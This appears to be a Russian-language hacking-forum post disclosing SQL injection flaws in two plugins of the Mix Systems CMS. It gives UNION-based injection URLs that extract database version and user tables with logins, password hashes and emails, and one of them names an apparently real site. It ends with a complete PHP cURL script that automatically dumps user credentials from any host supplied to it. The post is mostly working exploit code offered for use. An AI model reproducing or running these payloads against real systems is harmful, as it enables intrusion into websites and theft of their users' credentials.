|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
Mix Systems
vendor:http://mixsystems.com.ua
price "МИКС-ВИЗИТКА от 500 у. е." -- "МИКС-ПОРТАЛ от 5000 у. е."
SQL injection
plugin:katalog
EX
Код:
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+order+by+18/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Код:
version::user::database
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
users id::login::pwd::email
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users/*
http://site.com/index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,id,login,pwd,email),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+1,1/*
plugin=photogall
Ex
Код:
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'&cat=11
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+order+by+12/*&cat=11
Код:
version::user::database
http://site.com/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12/*&cat=11
users id::login::pwd::email
http://www.sahm.com.ua/index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,id,login,pwd,email),5,6,7,8,9,10,11,12+from+ng_users/*&cat=11
(c) halkfild
написал сплоит на CURL /*быстрее чем сокеты*/
PHP код:
<?
echo "\n";
echo "-------------------------Mix Systems CMS--------------------------"."\n";
echo "-----------------------coded by : halkfild------------------------"."\n";
echo "------------------------------------------------------------------"."\n";
if ($argc!=4){
echo " Usage: php ".$argv[0]." host type num_records\n";
echo " host: Your target ex www.target.com \n";
echo " type: 1 - plugin=katalog bug\n";
echo " 2 - plugin=photogall bug\n";
echo " num_records: number or returned records(if 0 - return all)\n";
echo " example: php script.php site.com 10\n";
echo "\n";
exit;
}
$host=$argv[1];
$type=$argv[2];
$count=$argv[3];
if ($argv[2]==1) {
$query="index.php?plugin=katalog&do=showUserContent&type=tovars&id=-395'+union+select+1,2,3,4,5,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),7,8,9,10,11,12,13,14,15,16,17,18+from+mix_users+limit+";
$end=",1/*";
}
elseif ($argv[2]==2) {
$query="index.php?plugin=photogall&do=exposure&path=product&parent=49'+union+select+1,2,3,concat_ws(0x3a3a,CHAR(64),id,login,pwd,email,CHAR(64)),5,6,7,8,9,10,11,12+from+ng_users+limit+";
$end=",1/*&cat=11";
}
else {
echo " incorrect parameter #2=".$argv[2]."\n";
echo " type: 1 - plugin=katalog bug\n";
echo " 2 - plugin=photogall bug\n";
exit;
}
$site=$host.'/'.$query;
$pattern='/@::(\d+)::(.*)::([0-9a-z]{32})::(.*@.*)::@/';
$i=0;
if(function_exists('curl_init'))
{
while(1) {
$ch = curl_init("http://".$site.$i.$end);
curl_setopt($ch, CURLOPT_HEADER,true);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_TIMEOUT,10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");
$res=curl_exec($ch);
$returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
curl_close($ch);
if ($returncode==404) exit ("Vulnerable script not found. Check your site and settings :| \n");
if(preg_match_all($pattern,$res,$out)) {
echo "| ".$out[1][0]." | ".$out[2][0]." | ".$out[3][0]." | ".$out[4][0]." |\r\n";
$i++;
$out=null;
}
else break;
if ($count!=0 && $i>$count) break;
}
echo ("Finish. /* ".$i." records*/ \n");
}
else
exit("Error:Libcurl isnt installed \n");
?>
|